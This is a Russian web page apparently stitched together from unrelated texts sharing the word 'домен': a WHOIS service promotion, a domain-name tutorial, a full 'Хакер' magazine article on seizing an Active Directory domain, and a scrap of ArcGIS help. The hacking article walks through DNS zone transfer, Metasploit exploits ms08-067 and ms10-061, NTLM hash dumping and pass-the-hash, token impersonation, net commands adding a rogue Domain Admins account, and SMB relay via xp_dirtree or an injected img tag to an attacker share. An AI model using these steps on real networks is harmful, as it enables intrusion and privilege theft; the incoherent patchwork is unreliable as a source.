Информация по домену: Как проверить домен на занятость. Что такое Whois

Содержание

проверка информации о домене. Возраст домена, DNS, дата регистрации, кому принадлежит.

Все о сервисе Whois

Интернет устроен так, что никакой информации о сайте помимо его адреса и того, что владелец ресурса сам решит сообщить на его страницах получить так просто не удастся. Чтобы это сделать нужно обладать недюжинными познаниями в области сетевых протоколов и навыками программирования. Таким образом 99.9% пользователей остаются в полном неведении относительного того, кому же реально принадлежит сайт, где физически он расположен и прочих полезных сведений. Однако в мире информационных технологий все тайное рано или поздно становится явным. Так произошло и в рассматриваемом нами случае. Сервис под названием «Whois» позволяет добраться до идентификационных данных домена буквально в один щелчок мышью. Тем, кто не знает, что такое домен, мы предпослали небольшой экскурс в технологии Интернета.


Что такое домен?

Нет, мы не станем мучить читателя рассказами о доменных печах или о типах данных полей СУБД. Нас интересует понятие домена в Web. То есть то, что так или иначе связанно с термином «доменное имя». Доменное имя это адрес сайта в грамматически привычной записи (в отличие от ip-адреса, выполняющего практически ту же самую функцию, но совершенно не запоминаемого). Это привычные слова разделенные точками, заносимые нами в адресную строку интернет-обозревателя (браузера). Например, «ru.wikipedia.org» — это полное доменное имя русского раздела Википедии. Число точек плюс единица — означает так называемый «уровень» домена. Так, приведенный нами пример, — это доменное имя третьего уровня (2 точки + 1).


Разделенные точками компоненты адреса не равнозначны. Самая правая (в примере — «org») представляет собой имя верхнего домена. Сайтов с таким окончанием существует видимо-невидимо и каждое такое (обычно двух- или трех буквенное) обозначение обладает определенной семантикой. Например, милитаристские сайты публикуют в верхнем домене «mil», коммерческие — «com», образовательные — «edu», правительства сидят под «gov» и так далее. Каждая уважающая себя страна также имеет свой домен верхнего уровня (Россия — «ru»). Затем идут домены второго уровня. К примеру «wikipedia.org» типичный пример такого адреса. Важно понять, что это не адрес отдельной страницы. Та же Вики разрослась до миллионов страниц. К наиболее простому случаю относятся домены третьего уровня.

Чтобы добраться до определенного сайта запрос от браузера порой пересекает континенты и, будучи обработан на множестве промежуточных серверов, в конечном счете достигает своей цели. Вся эта феноменальная транспортная сеть стала возможной только потому, что на некоторых из этих серверов хранятся обширнейшие базы данных адресов доменов с разнообразной информацией о них, наподобие ip-адреса, физического местоположения конечной точки по этому адресу и прочего. Идея сделать эту информацию доступной любому пользователю была положена в основу сервиса «Whois», для чего был даже разработан специальный сетевой протокол с одноименным названием.

С точки зрения обычного потребителя услуг Интернета «Whois» — это не более чем обыкновенная веб-страница со строкой для ввода адреса сайта и кнопкой с надписью вроде «O`kay». Щелкнув по такой кнопке вы в мгновение ока можете заполучить массу подробностей об интересующем вас интернет-ресурсе. Именно так устроен сервис «Whois» нашей компании — бесплатное «шпионское» окно для подсматривания за владельцами сайтов.

Что можно узнать о домене через Whois?

Не вдаваясь глубоко в подробности заметим, что в базах DNS-серверов, хранящих сведения о доменах каждый такой домен представлен записью в таблице с такими примерно полями:

  • Поле «A» содержит ip-адрес ассоциированный с текстовым доменным именем.
  • Поле «HINFO» — информация о хосте — то есть компьютере где размещен ресурс.
  • Поле «MINFO» — информация о почтовом ящике домена.

И еще десятке других, более менее полезных для опознавания сайта. Но сама по себе эта информация недоступна протоколу Whois. Данный протокол получает приблизительно аналогичные сведения от whois-серверов (обычно принадлежащих сетевым регистраторам), где информация о доменах, сетях и организациях-владельцах храниться в виде пар «ключ-значение». Например, типичная такая пара для электронной почты может выглядеть так: «email:[email protected]». Вот эти то пары разбивает и отправляет нам в удобном виде Whois.


Любопытно знать, как происходит обмен данными между whois-серверами. Это поможет понять, почему запрос к Whois иногда не дает ожидаемых результатов. Конкретные сведения о том или ином домене могут находиться на любом из серверов. Приняв запрос пользователя и не обнаружив у себя конкретных данных о домене, сервер просматривает собственную базу данных ссылок на другие whois-сервера и обнаружив ней ссылку на сервер имеющий нужные сведения начинает с ним переговоры. Это не всегда приводит к успеху, так как требуемая информация может быть уже удалена, а ссылки на нее все еще продолжать храниться. Поэтому не получив желаемого не стоит огрызаться на владельцев сервиса Whois — от них в этом плане мало что зависит. Но если данные на серверах имеются — вы из обязательно получите!

Как бы то ни было Whois потенциально способен вернуть вам ответ, как минимум содержащий такие пункты:

  • Имя сервера.
  • Краткие сведения об организации — владельце сервера.
  • Персональные данные администраторов сервера и их контактные координаты.
  • Ну и конечно ip-адрес ресурса.

Как использовать наш сервис?

Так же как и любой другой подобный ресурс — вбиваете в строку конкретный адрес, жмете на кнопку и дожидаетесь развернутого ответа «Whois». Наш сайт отличается от многих других улучшенной эргономикой, приятным глазу интерфейсом и тем, что он не перегружен запросами, как иные страницы в сети. Так что перебоев в работе с ним или длительного ожидания не предвидится. Ответ выдается в удобной для восприятия форме, а не просто как не отформатированный и нечитабельный текст. Надеемся наш «Whois» — вам понравится!

Анализ структуры ответа Whois

Поскольку на ваш запрос может поступить довольно много разной интересной информации, мы решили разбить ее на порции и обсудить каждую в отдельности. Дабы не создавать в голове читателя кашу. Итак, как выглядит ответ от сервиса?

Дата регистрации и возраст домена

Первыми в списке выдачи идут поля идентифицирующие сам домен. Интерес представляют поля «Сreated», «Last Updated» и «Expiration Date». Обозначены они могут быть слегка по-иному т. к. сайт сервиса может их подредактировать для удобства восприятия. Опишем смысл этих значений:

  • Created — означает дату регистрации. Это величина постоянная и не меняется даже в том случае, если контроль над сайтом был на время утерян его владельцем (вследствие, например, неуплаты).
  • «Last Updated» (или changed) — не стоит обольщаться и думать будто узнав значение этого параметра вы поймете когда на сайте были сделаны последние изменения. Это всего лишь дата изменения информации о самом домене.
  • «Expiration Date» (или free-date) — Плановая дата окончания срока регистрации домена.

Этого вполне достаточно, чтобы путем простых арифметических подсчетов вычислить возраст домена. Но не возраст сайта, т. к. домен мог быть зарегистрирован задолго до того, как владелец стал заполнять информацией свои странички. Некоторые домены так и остаются пустыми, лишь бы за них исправно вносилась арендная плата. Тут же может присутствовать (а может и отсутствовать) некий description — произвольная текстовая информация о домене, информация о спонсорах (буде такие имеются) и вспомогательные статусные поля, смысл которых мы тут не рассматриваем за ненадобностью.

Владельцы домена

Информацию о владельцах условно можно разделить на две группы сведений: о собственно владельцах и о административном персонале домена. Важно понимать, что владелец сайта и владелец домена могут совпадать, а могут не иметь друг к другу никакого отношения. Владелец (или регистрант, или администратор домена) — это лицо или организация зарегистрировавшие домен у сетевого регистратора. О владельце Whois выдает достаточно подробную информацию, включающую:

  • Имя регистранта (Registrant Name). Оно может совпадать с названием компании-регистранта (см. ниже).
  • Название компании-владельца домена (Registrant Organization).
  • Страна в которой расположен регистрант (Registrant Country).
  • Наименование региона (Registrant State).
  • Город в котором расположен владелец (Registrant City).
  • Улица и дом (Registrant Street).
  • Почтовый индекс (Registrant Postal Code).
  • Телефонный номер и добавочный телефонный номер (Registrant Phone и Registrant Phone Ext).
  • Факс и добавочный факс (Registrant Fax и Registrant Fax Ext).
  • Адрес электронной почты (Registrant Email).

Вся та же самая информация приводится и для администратора домена — представителя управляющего персонала, непосредственной управляющего данным конкретным доменом. Крупные ресурсы, наподобие Википедии содержат целый штат администраторов из разных стран мира, поэтому имеется в виду ответственное лицо. Точно так же телефон владельца не выведет вас на высшее руководство крупной компании владеющей серьезным порталом. Если вы решили набрать один из двух телефонных номеров — владельца или администратора — сначала хорошо подумайте о том, с какой целью вы собрались это делать и кто именно из них вам нужен. Тут же обычно приведены данные техподдержки домена («Tech Name» и так далее).

DNS-сервер домена

Для начала пару слов о том что такое DNS-сервер. Под этим термином подразумевается и конкретный физический сервер, хранящий базу данных адресов доменов и программа, обслуживающая запросы на извлечение информации из этой БД. В случае с Whois речь, конечно же, идет о первом способе трактовки. DNS-сервера предназначены для отображения вбиваемого в адресную строку браузера текста в ip-адреса серверов, через которые проходит запрос пользователя, прежде чем добраться до искомого сайта и вернуть вам требуемую вами интернет-страницу. Это необходимо потому, что сетевые протоколы не работают непосредственно с адресами представимыми в удобоваримой форме — они используют ip. Таким образом сведения выдаваемые Whois относятся к списку DNS-серверов поддерживающих интересующий вас домен. Их может быть несколько, что и отражено в отчете сервиса в полях под названием «Name Server». Выглядеть они могут вполне «зверски». Например, для Википедии это «NS0.WIKIMEDIA.ORG», «NS1.WIKIMEDIA.ORG», «NS2.WIKIMEDIA.ORG».


Кому и зачем нужен Whois?


Применений у сервиса несколько. Допустим вы разработали свой уникальный сайт и наполнили его ценной, редко встречающейся информацией. Естественно, со временем вы ожидаете притока посетителей и может быть даже уже подсчитываете хрустящие в кармане купюры. Однако счастье все не приходит и не приходит. Отчаявшись, вы начинаете искать причины вашего горя и, попутешествовав немного по сети, внезапно обнаруживаете вора, скопипастившего весь ваш контент к себе на страницы. Возмущенью нет предела, а руки так и чешутся начистить кому-то лицо. Но, как человек умный, вы быстро соображаете, что сделать это удаленно затруднительно, а даже совершив сей поступок можете легко предстать пред очи наших доблестных органов правопорядка. Выход есть — воспользовавшись нашим whois-сервисом, вы собираете все данные обидчика и далее действуете смотря по обстоятельствам. Для начала связавшись с владельцем домена фейкового сайта.

Описанный вариант типичен, но не единственен. Whois может понадобиться не только в борьбе с жуликами и конкурентами, но и в мирных целях. Решив создать свой сайт, вы наверняка придумаете ему звучное и много говорящее посетителям имя. Но не стоит радоваться раньше времени. Фантазия есть не только у вас. Возможно, что домен с таким именем уже давно зарегистрирован. Убедиться в том, что это не так также поможет наш сервис. Наконец, нельзя исключать простое любопытство. Или не простое, а деловое, в том случае если владелец чужого сайта не оставил на нем контактной информации, а пообщаться с ним хочется.

Что такое доменные имена — Изучение веб-разработки

Кто владеет доменным именем?

Вы не можете “купить доменное имя”. Вы платите за право использовать доменное имя в течение одного или нескольких лет. Вы можете продлить это право и ваше продление будет иметь безусловный приоритет над заявками на домен от других желающих. Но вы никогда не будете владеть доменным именем.

Компании, называемые регистраторами, ведут реестры доменных имён, которые содержат техническую и административную информацию, связывающую вас и ваш домен.

Примечание: Для некоторых доменных имён регистратор может отсутствовать, реестр может не вестись. Например, все домены в зоне .fire используются компанией Amazon только в собственных нуждах.

Как найти свободное доменное имя

Для того, чтобы определить, свободно или нет желаемое доменное имя, сделайте следующее,

  • Перейдите на веб-сайта регистратора доменных имён. Большинство из них предоставляют сервис «whois», который подскажет вам, свободно ли желаемое доменное имя.
  • Также мы можете использовать командную строку, введя в ней команду whois и получив ответ, например, для mozilla.org:
$ whois mozilla.org
Domain Name:MOZILLA.ORG
Domain ID: D1409563-LROR
Creation Date: 1998-01-24T05:00:00Z
Updated Date: 2013-12-08T01:16:57Z
Registry Expiry Date: 2015-01-23T05:00:00Z
Sponsoring Registrar:MarkMonitor Inc. (R37-LROR)
Sponsoring Registrar IANA ID: 292
WHOIS Server:
Referral URL:
Domain Status: clientDeleteProhibited
Domain Status: clientTransferProhibited
Domain Status: clientUpdateProhibited
Registrant ID:mmr-33684
Registrant Name:DNS Admin
Registrant Organization:Mozilla Foundation
Registrant Street: 650 Castro St Ste 300
Registrant City:Mountain View
Registrant State/Province:CA
Registrant Postal Code:94041
Registrant Country:US
Registrant Phone:+1.6509030800

Как вы видите, нельзя зарегистрировать доменное имя mozilla.org потому что Mozilla Foundation уже зарегистрировало его.

Теперь давайте посмотрим, можно ли зарегистрировать доменное имя afunkydomainname.org:

$ whois afunkydomainname.org
NOT FOUND

Как вы видите, домен не существует в базе данных whois (на момент написания этой статьи), соответственно, его можно зарегистрировать.

Как получить доменное имя

Процедура довольно проста:

  1. Перейдите на веб-сайт регистратора доменных имён.
  2. Обычно там есть кнопка «Зарегистрировать домен» или что-то подобное. Нажмите её.
  3. Заполните форму требуемыми данными. Убедитесь, что вы не опечатались в названии доменного имени. Потому что, если вы оплатите его, то будет уже поздно исправлять ошибку!
  4. Регистратор сообщит вам, когда доменное имя будет корректно зарегистрировано. Через несколько часов все DNS-сервера обновятся и ваш домен начнёт работать.

Примечание: В процессе регистрации регистратор доменов спросит вас ваш реальный домашний или рабочий адрес. Обязательно заполните его корректно, потому что многие национальные регистраторы могут отменить регистрацию домена, если был указан ошибочный адрес.

Обновление DNS

Базы данных DNS хранятся на каждом DNS-сервере по всему миру и эти серверы обращаются за обновлениями к нескольким серверам, называемым “authoritative name server” или “корневой DNS-сервер”. Когда ваш регистратор создаёт или обновляет информацию о зарегистрированном домене, она должна обновиться во всех DNS-базах. Каждый DNS-сервер хранит информацию о домене фиксированное количество времени, а затем автоматически обновляет её (DNS-сервер запрашивает корневой сервер снова). Соответственно, обновление баз занимает какое-то время, пока информация о новых или изменённых доменах распространяется по Интернету.

Примечание: Это время часто называется время распространения. Тем не менее эта задержка не означает, что за это время доменное имя обновит само себя на всех серверах сверху донизу. Очень часто DNS-сервер, запрашиваемый вашим компьютером не знает конкретного домена и запрашивает о нём корневые DNS-сервера по мере требования.

завладеваем корпоративной сетью — «Хакер»

Содержание статьи

Большая часть всех корпораций, компаний и мелких фирм используют для построения корпоративной сети технологию Aсtive Directory и ОС семейства Windows. Сегодняшняя статья будет посвящена простой теме — захвата прав администратора в домене обезличенной корпоративной сети. Мы, конечно, поговорим об уязвимостях в службах и ОС, но в основном разговор будет об общих проблемах в архитектуре сети и проблемах аутентификации.

 

Домен. Просто домен

Перед тем, как начать, посмотрим, что представляет собой абстрактная корпоративная сеть. Начнем с понятия Active Directory. На самом деле это служба каталогов, которая удобно хранит ресурсы сети и их «свойства». Типа каталога папочек в ящике, где описано, что за сервера в сети, что за рабочие станции,  принтеры, какие есть пользователи, в каких группах они состоят. Ящик в данном случае — это сервер (контроллер домена), где централизованно хранится вся эта информация. Администратор контроллера домена — царь в корпоративной сети. Вернее, он царь той ее части, которая состоит в домене. Если компьютер или сервер в нем не состоит, то прав у администратора на машину нет, так как аутентификация и авторизация проводится без участия контроллера домена. Однако в большинстве случаев почти все сервера и рабочие станции состоят в домене, так как ради этого, собственно, домен и поднимается. Понятно, что серверные ОС  — это, в большинстве своем, Windows 2000/2003/2008, а рабочки — XP/Vista/7. Можно намного подробнее описать, что такое домен и как он работает, но в таком случае места на рассказ о слабых местах практически не останется. Для тех, кто хочет начать с основ — советую статью в русской Википедии.

 

Сеть

Как говаривали в Sun: «Компьютер — это сеть», поэтому рассмотрим простейшую сеть. Самое главное, как ты уже понял, это контроллер домена. Это сердце сети. Контроллер отвечает за аутентификацию, доменные имена машин, политики для серверов и рабочих станций. То есть за все. Кроме основного сервера могут быть еще машинки, необходимые для организации бизнес-задач компании: почта, терминалки, базы данных и так далее. Потом идут рабочие станции. В простейшем (читай — худшем) случае вся эта тусовка располагается в одном сегменте сети. Как правило, если мы говорим о небольших компаниях, то так оно и есть. В больших компаниях все не так просто: в дело вступают сетевые устройства, которые разбивают сеть на сегменты, пропиливая дырки из сегмента в сегмент для нужных протоколов, сетей и серверов. Во всем этом благополучии часто бывает и Wi-Fi роутер, который дает доступ в сеть для любителей ноутбуков (кстати, именно роутер и становится основной точкой входа в сеть для плохих парней, но не он один). Атаки на браузер и плагины к нему — самый популярный способ проникнуть из интернета в сеть компании или банка. Кроме всего перечисленного, еще остаются варианты с троянами, подключениями к LAN через плохо контролируемые порты и, в конце-концов, банальный инсайд. В любом случае, все это выходит за рамки статьи, но понимать, что безопасность домена дело не последнее — все же необходимо.

 

Разведка

Любое дело начинается с разведки. Цель ясна — стать администратором домена, но по пути к этой цели надо выявить критичные точки и… саму цель. Как же найти контроллер домена самым бесшумным путем? Вспомним, что наш волшебный ящик с папками отвечает за имена ресурсов — DNS-имена. Исходя из этого, очевидно, что на искомом сервере должен быть поднят сервис доменных имен, то есть открыт 53-й порт. Но не спеши запускать nmap. В случае, если IP-адрес мы получаем по DHCP, то он же нам и раскроет имя DNS-сервера, так что просто набери в консоли nslookup и с вероятностью 70% ты получишь адрес контроллера домена.

Но сразу в лоб брутить пароли от домена, опять же, не рекомендуется — нужно оглядеться и посмотреть, кто есть вокруг. Определить вкусные цели, так сказать. Варианта два — ARP-пинг по подсети и опрос по DNS. ARP-PING это простой способ определить, жив компьютер с данным IP-адресом или нет. Напомню, что согласно модели OSI ниже сетевого уровня у нас существует канальный. Именно по этому уровню физически определяется, на какую сетевую карточку слать пакет. Таким образом, ARP-PING представляет собой следующий диалог:

Хакер ко ВСЕМ: Ребят, в каком доме живет Петя Шеллкодов?
Дом 3 к Хакеру: О, это ж я - Петя Шеллкодов! Чувак, тебе в дом номер 3!

Другими словами, происходит широковещательный запрос по протоколу ARP, в рамках которого запрашивается MAC-адрес того чувака, которому присвоен искомый хакером IP-адрес. Вариант очень быстрый и эффективный. В качестве инструментария рекомендую nmap либо Cain&Abel. Но можно и опросить сам домен — мол, расскажи, где у тебя что :). Если администратор домена недостаточно аккуратно настроил DNS, то мы можем попросить список всех записей для данного домена. Это называется трансфер зоны DNS. Для данного действия достаточно подсоединиться к DNS сервису и выполнить команду листинга зоны.

Из-под винды это делается так:

C:> nslookup
Default Server: windomain.domain
Address: 192.168.1.33

ls -d windomain.domain > file.txt

Если все в порядке, то в файле file.txt ты найдешь имена компьютеров и их IP-адреса. Зачем это надо? В 80% случаев в имени компьютера заложена полезная информация, в частности — его назначение (например, для организации атаки «человек посередине» или поиска SQL-серверов). Если зона DNS не отдается, то тогда для получения имени можно резолвить каждый IP-адрес, который получен в результате ARP-скана (Cain умеет это делать). Этот вариант потребует времени, но зато он более точный. Кроме имен компьютеров хорошо получить еще и список пользователей (имена учетных записей) домена. Опять же, если администратор домена недоделал свое дело, то получить юзеров можно, подсоединившись к контроллеру домена по так называемой нулевой сессии к ресурсу IPC$. После чего можно попросить отдать список всех пользователей с комментариями. Эта информация может оказаться полезной для вычисления администраторов домена и прочих ключевых фигур. Кроме того, можно уже начинать подбирать учетные записи, где логин пользователя такой же, как и пароль :).

К слову, если админ все же запретил получение списка пользователей, мы можем перебрать его сами. Дело в том, что каждый пользователь имеет идентификатор безопасности (SID). Если опрашивать домен, подставляя эти идентификаторы и инкрементируя лишь значения RID (последние несколько байт SID), то можно получить список пользователей. Хочу также отметить, что весь этот функционал включен в состав Cain&Abel, хотя можно воспользоваться и оригинальными тулзами Евгения Рудного (sid2user).

Выделив ключевые сервера и рабочие станции, стоит их просканировать. Аккуратно и быстро — nmap’ом. При этом даже не нужно сканить все порты с определением сервисов и ОС — это шумно. Выделяем ключевые порты в зависимости от цели: для БД — порты основных БД плюс порты управления (например, radmin), для рабочек — шары (radmin/vnc). В общем-то, про разведку можно писать еще много, на эту тему получится не одна статья, но самое важное я, вроде, описал. Да, и еще — всегда держи снифер под рукой, на стадии разведки он расскажет многое. Также тут не упоминается про атаки на свичи и маршрутизаторы, но просто помни — они тоже могут быть слабым звеном (дефолтовые пароли/SNMP строки доступа).

 

Атака

После разведки можно уже мочить. Как, когда, кого и чем — зависит от результатов разведки. Но один из самых простых вариантов — пробить эксплойтом в лоб. При этом эксплойт должен быть такой, чтобы не уронил систему и гарантировал доступ :). Как правило, эти сплойты пришли к нам из кодов червей. Особо париться тут не стоит — открывай метасплойт, там уже все есть, и выполни поиск:

search ms0 -t great

В результате ты получишь список стабильных сплойтов для нашей любимой платформы. Из этого списка осталось только выбрать удаленные и направленные на службы. Скорее всего, это будут дети от Conficker и Stuxnet, а именно — ms08-067 и ms10-061 соответственно. Это хорошие, проверенные сплойты, не раз дававшие шеллы автору :). Собственно, для работы с ними никаких знаний почти не нужно. Только учти, что ms10-061 работает только в том случае, если на атакуемом компе готова служба печати, то есть расшарен принтер и у тебя хватит прав на печать. Поэтому удобно перед атакой просканить подсетку на расшаренные принтеры или поискать их по домену — скорее всего, таким макаром ты попадешь на старые, заброшенные серваки, непропатченный принт-сервер или рабочую станцию. К слову — данный вариант очень шумный, и если в компании есть сетевая IDS, то ты можешь быть обнаружен. Обращаю внимание, что IDS так же ловят в сети сигнатуру шелла винды, так что в качестве нагрузки советую использовать meterpreter (он шифрует данные) — автору это помогло.

Что же делать, если с эксплойтами идти в бой страшно или все сервера и рабочки пропатчены? Как показывает практика, есть куча способов получить шелл без эксплойтов. В дело вступают «слабые пароли». Это частая ситуация: даже если на доменные учетки пароли и сильные, то пароль на локальную учетную запись Администратора может быть слабым, так как устанавливался он, например, до ввода компа в домен и может быть любым. Более того, такой пароль, как правило, одинаковый для всех локальных админских учеток и на других машинах :).

Все, только что сказанное, не просто догадки сумасшедшего, а частое явление в реальных компаниях. Но я хочу сказать об одном очень популярном методе проникновения — через СУБД. Чем больше компания, тем больше у них СУБД, а чем больше СУБД, тем больше шансов проникновения на эти сервера. И я опять про плохие пароли, например в MSSQL 2000 это «sa:sa», а в Oracle 9i — «system:manager». С более новыми БД сложнее, но и они — частые пациенты. Вообще вся эта глава посвящена главной задаче — получить шелл хоть на каком-то компе в домене. Я перечислил самые простые способы такого получения (как получить шелл из БД — это уже вне темы этой статьи, об этом много писалось ранее), которые не раз давали автору и его коллегам желанный доступ к системе, но по факту, конечно, все зависит от конкретной сети.

 

HASH и токены

Захват рабочей станции или сервера — это уже полдела. Но что же дальше? Как уже писалось выше, «Компьютер — это сеть». Данное правило применимо и для домена. Если был захвачен хоть один компьютер домена, можно с большой вероятностью говорить о захвате всего домена. В чем дело? А дело в доверенной системе, на которой основана сеть и система безопасности, как на уровне ОС, так и на уровне домена. Итак, что же делать на захваченном хосте в первую очередь? Сначала самое главное — понять свои права. В ряде случаев это будет NT AUTHORITYSYSTEM, в других — доменная учетная запись с небольшими правами. Но так или иначе на первом этапе нам нужны именно права системы, так что если мы их не имеем, то следует их получить. Получить их можно, например, прямо из метерпретера, в котором есть простая команда getsystem. Данный модуль попробует поднять права в ОС, используя уязвимости MS09-012, нашумевший MS10-015 (KiTrap0D) и не только. Однако в большинстве случаев желательно, чтобы пользователь был в группе локальных админов — например, чтобы имперсонализироваться (об этом позже).

Системные права нам нужны для того, чтобы выдрать все самое ценное из недр ОС, а именно NTLM хэши, и список токенов безопасности. Зачем нам хэши? Чтобы брутить их? Нет. Чтобы использовать их. Дело в том, что для аутентификации в домене очень часто не нужен пароль — ведь винда не спрашивает пассворд каждый раз, когда ты идешь на какую-нибудь шару в домене. Реализовано это с помощью NTLM Chalenge response аутентификации. Дело в том, что для такой аутентификации знания пароля не нужно, достаточно только значения хэша. Фактически об этой проблеме было известно с середины 90-х, но с годами мало что поменялось. Поэтому, достав хэши, ты можешь спокойно ходить по домену с правами пользователя. Более подробно о хэшах можно почитать в статье Антона Карпова aka toxa. Я же расскажу про реальную историю захвата домена.

Был, значит, получен доступ к компьютеру веб-девелопера через SQL-инъекцию на его веб-стенде. Сервак был MSSQL, учетка — SA. Соответственно, через xp_cmdshell был закачан и запущен meterpreter, получен полноценный доступ с правами SYSTEM. Но ничего особо ценного для захвата домена на этом компе не нашлось, поэтому были изъяты хэши учетки программиста. Как известно, хэши хранятся в ОС во многих местах, но самое вкусное — это кэш LSA, который «помнит» хэши последних юзеров. В любом случае есть еще и SAM-база. Автор советует использовать утилиты gsecdump и wce, с помощью которых можно полноценно дампить нужные хэши. А с этими хэшами уже лазить по домену, где, кстати, был найден принт-сервер. Учетка программиста состояла в группе, у которой были права на печать на одном из принтеров сервера. Используем хэши-учетки для модуля метасплойта, который эксплуатирует MS10-061.

ms10_061_spoolss>set SMBUser user
ms10_061_spoolss>set SMBDomain DOMAIN
ms10_061_spoolss>set SMBPass 01010101010101010101010101010101:01010101010101010101010101010101

Эксплойт MS10-061, запущенный от имени программиста, дал системный доступ к принт-серверу, где уже были найдены процессы с токенами администратора домена. Получается цепочка атак, которая приводит к захвату домена.

Итак, мы попали на принт-сервер с правами системы, но мы еще не админы домена, однако я упомянул выше про токены. Токен — это объект ОС, который создается при логоне и дается каждому процессу, запущенному юзером. Этот токен — лакомый кусочек. В нашем случае админ домена запустил какие-то процессы на принт-сервере, а у нас права системы на этом же сервере — соответственно мы имеем привилегии SeImpersonate и можем спокойно использовать существующий токен «делегирования» (несмотря на патч MS09-012, который тут как бы не о чем).

Выглядит это довольно просто:

meterpreter> use incognito
meterpreter> list_tokens -u
meterpreter> impersonate_token DOMAIN\admin

После того, как мы выполнили имперсонализацию, система будет использовать права украденной учетки. То есть, мы стали админом домена. Соответственно, выполняем:

meterpreter>shell
C:windowssystem32>net user xakep p4sSw_0Rd /ADD /DOMAIN
C:windowssystem32>net group "Domain Admins" xakep /ADD /DOMAIN

Команды исполнятся, и у контроллера домена появится новый администратор (кстати, не рекомендую так делать, так как в нормальных компаниях такой пользователь сразу будет обнаружен). Мораль истории такова: любая, даже самая маленькая дырочка, на самом незначительном сервере или рабочке может привести к захвату домена, так как «компьютер — это сеть»…

 

Простые атаки или SMB-RELAY

Предыдущий (реально существовавший) пример показал, как получить права админа, зацепившись за любую машину домена. Тогда нам понадобились уязвимости, но они не всегда могут присутствовать, например, если поднят WSUS и все хосты домена своевременно получают обновления. Тем не менее, бывает так, что и без уязвимостей можно получить шелл на сервачке. Частый случай — через СУБД. Для этого требуется хоть какая-нибудь учетка на сервере СУБД.

Кстати, вспоминая о gsecdump: он дампит LSA-секреты, в которых очень часто бывают пароли от БД и прочего добра. В открытом виде. Кроме того, в больших компаниях часто есть различные ERP-системы, в которых аутентификация использует доменные учетные записи и различные пароли по умолчанию. К тому же, есть шанс найти SQL-инъекцию. В общем, любой доступ к БД нам подойдет. Мы говорим про MSSQL, как про наиболее частую СУБД в Microsoft сетях, хотя и Oracle тоже сойдет.

Второй важный пункт — процесс СУБД должен быть запущен под доменной учетной записью, которая состоит в группе локальных админов для сервера СУБД. Если все эти условия соблюдены, то можно выполнить атаку SMB-RELAY через вызов хранимой процедуры xp_dirtree/xp_fileexist (которая также должна еще и быть доступна). В качестве параметра эти процедуры берут путь к папке/файлу. Суть в том, что они понимают путь в формате UNC, то есть могут обращаться к файлам на удаленном ресурсе. В случае, если эти ресурсы требуют аутентификацию, то происходит NTLM chalenge response аутентификация, из-под которой, используя учетку, запущен процесс СУБД. Таким вот образом можно указать в качестве удаленного ресурса хост хакера с запущенным модулем SMB-RELAY (есть в составе метасплойта). Данный модуль реализует атаку «человек посередине», перенаправляя аутентификацию на другой сервер СУБД (например, на резервный — главное, чтобы учетка там имела права локального админа). Таким образом, сервер сгенерирует ответ и отправит его хакеру, который, в свою очередь, передаст его серверу, где начата атака. В общем, классический «человек посередине». Таким образом хост хакера аутентифицируется на резервном сервере, закачает туда метерпретер и получит права учетки СУБД (так как она в группе локальных админов, то это равносильно SYSTEM). Зачем нам второй сервер, ведь можно указать в качестве цели тот же сервер, откуда был послан запрос (то есть атака с сервера «А» на сервер «А»)? Вообще да, можно, но только если на сервере «А» не установлен патч для MS08-068. В противном случае нужно два сервера.

Примечание: автор заметил, что если мы атакуем кластер, то патч для MS08-068 не работает, поэтому можно выполнять атаку с ноды кластера на кластер и мы получим шелл на той же ноде. Данная уязвимость имеет смысл не только в контексте СУБД. Обычная XSS может дать полноценный шелл, достаточно подсунуть админу домена следующий код:

<img src="\attackershara">

В любом случае, эта проблема не фиксится полностью, а потому атаки на основе SMB-RELAY — реальная угроза.

 

Простые атаки или ARP-SPOOFING

Нельзя не упомянуть и про старый добрый ARP-SPOOFING в контексте захвата домена. Атака основана на флуде ARP-ответов для хостов «А» и «Б» с хоста «В». Хосту «А» посылаются пакеты с утверждением, что IP-адрес «Б» принадлежит машине с маком «В». Хосту «Б» посылаются пакеты с утверждением, что IP-адрес «А» принадлежит машине с маком «В». Таким образом все пакеты идут на хост «В», который их потом пересылает по назначению. Простое описание классической атаки «человек посередине». Функционал полностью присутствует в Cain&Abel и Ettercap. В контексте предыдущих тем можно сделать такое западло: вычислить админа (трансфер зоны DNS), вычислить прокси-сервер или шлюз, устроить ARP-SPOOFING и добавить в HTML-код пакета ответа от сервера к админу (в случае, если админ пошел на какой-нибуть веб-сайт) строчку вида <img src="\attackershara">. То есть выполнить SMB-RELAY атаку. Для этого нужно помучаться с Ettercap, но можно поступить и проще — поднять у себя веб-сервер с SMB-RELAY модулем.

Но это еще не все. Однажды мы делали внутренний пентест небольшой сетки, где все патчено-перепатчено, и пароли были очень стойкие, а больше там ломать-то было и нечего. Так как сетка маленькая, то сервера и рабочки были в одном сегменте — радость для любого ARP-флудера. По ДНС был вычислен админ и сервер терминалов. Начался спуфинг, и тут выяснилось, что один из админов использует старую версию протокола RDP, а как немногим известно — протокол версии меньше, чем шестая, уязвим к атаке «человек посередине». Таким образом, Cain расшифровал RDP-трафик админа на сервер терминала. А с помощью тулзы для парсинга логов Cain’а был получен пароль админа домена. Такие вот истории…

 

Баян

В чем смысл этой статьи? Что я хотел сказать? Ведь ничего нового раскрыто не было — эти атаки, уязвимости и фичи были известны давно (некоторые уже даже в течение десяти лет). Просто кое-что невозможно полностью исправить — ARPSPOOFING, SMB-RELAY, воровство Token’ов, HASH-and-PASS и так далее. Эти вещи заложены глубоко в архитектуру домена, ОС и сети, что делает любую ошибку на любом незначительном хосте опасной для всего домена.

Принцип «Компьютер — это сеть» работает вовсю. Потеряв один компьютер, с точки зрения безопасности мы можем потерять всю сеть. Было, конечно, не рассказано много чего еще: про парольные политики, сегментацию, настройку сетевого оборудования и прочее. Но я хотел обратить внимание на то, что любые вроде бы незначительные сервера и рабочки — значительны, что любые уязвимости, вроде трансфера зоны DNS — опасны.

Даже имя компьютера имеет свою цену с точки зрения безопасности. Я видел компании, где компьютеры операторов систем банк-клиент имели имена вида bankclient-1 и были они в домене, в том же сегменте сети. Пусть патченые, но ведь если я получу учетку домена (через другой хост, скажем, через принт-сервер), то потом вернусь на bankclient-1 и буду там хозяином. Так что наша с тобой задача — грамотно построить сеть и устранить в ней слабые звенья…

Назначить домен полю—Справка | ArcGIS for Desktop

Краткая информация

Устанавливает домен для конкретного поля класса объектов или для поля подтипа. Если подтипы не определены, домен будет присвоен указанному полю.

Использование

  • Управление доменами включает следующие шаги:

    1. Создать домен с помощью инструмента Создать домен.
